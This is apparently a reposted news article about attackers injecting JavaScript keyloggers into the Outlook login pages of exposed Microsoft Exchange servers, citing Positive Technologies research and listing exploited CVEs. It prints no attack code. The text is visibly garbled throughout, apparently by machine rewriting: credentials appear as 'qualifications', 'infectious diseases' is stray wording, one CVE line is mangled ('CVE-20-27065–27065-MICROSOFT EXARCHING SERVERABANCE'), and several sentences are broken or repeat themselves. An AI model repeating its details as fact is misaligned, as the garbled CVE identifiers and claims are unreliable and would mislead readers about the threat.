It has been observed that unidentified threat actors target publicly exposed Microsoft Exchange servers and inject malicious code into login pages that collect qualifications.
In a new analysis released last week, Positive Technology said it identified two types of keylogger codes listed in JavaScript on its Outlook login page.
Those who store the collected data in a local file that is accessible via the Internet, and those who immediately send the collected data to an external server
Russian cybersecurity vendors show the continuation of the campaign, which was first documented in May 2024 as targeting entities in Africa and the Middle East, targeting entities in Africa and the Middle East.
At the time, the company said more than 30 victims across government agencies, banks, IT companies and educational institutions had detected evidence of the first compromise date back to 2021.
Attack chain involves leveraging known flaws in Microsoft Exchange Server (such as ProxyShell) to insert keylogger code into the login page. Currently, we don’t know who is behind these attacks.
Below is a list of some of the weaponized vulnerabilities –
CVE-2014-4078-IIS Security Feature Bypass Vulnerability CVE-2020-0796-Windows SMBV3 Client/Server Remote Code Execution Vulnerability CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-20-27065–27065-MICROSOFT EXARCHING SERVERABANCE) CVE-2021-31206-Microsoft Exchange Server Remote Code Execution Vulnerability CVE-2021-31207, CVE-2021-34473, CVE-2021-34523-Microsoft Exchange Server Security Features BYPASS Vulnerability (ProxyShell)
“Malicious JavaScript code reads and processes data from the authentication form and sends it to a specific page on the compromised Exchange server via an XHR request.”
“The source code for the target page contains handler functions that read incoming requests and write data to a file on the server.”
Files containing stolen data can be accessed from external networks. It is known that selection variants with local keylogging also collect user cookies, user agent strings, and timestamps.
One advantage of this approach is that there is little chance of detection as there is no outbound traffic to send information.
Meanwhile, the second variant detected by positive technology uses telegram bots via XHR Get Request using passwords stored in Apikey and Authtoken headers, respectively, via XHR Get Requests.
The second method involves using a Domain Name System (DNS) tunnel in conjunction with HTTPS POST requests that send user credentials and pass through your organization’s defenses.
22 compromised servers have been discovered by government organizations, followed by infectious diseases in IT, industry and logistics companies. Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, Netherlands and Turkey are one of the top 10 goals.
“The numerous Microsoft Exchange servers accessible from the Internet remain vulnerable to older vulnerabilities,” the researchers said. “By embedding malicious code into legitimate authentication pages, attackers can capture user credentials in plain text while still leaving them undetected for a long period of time.”
Source link
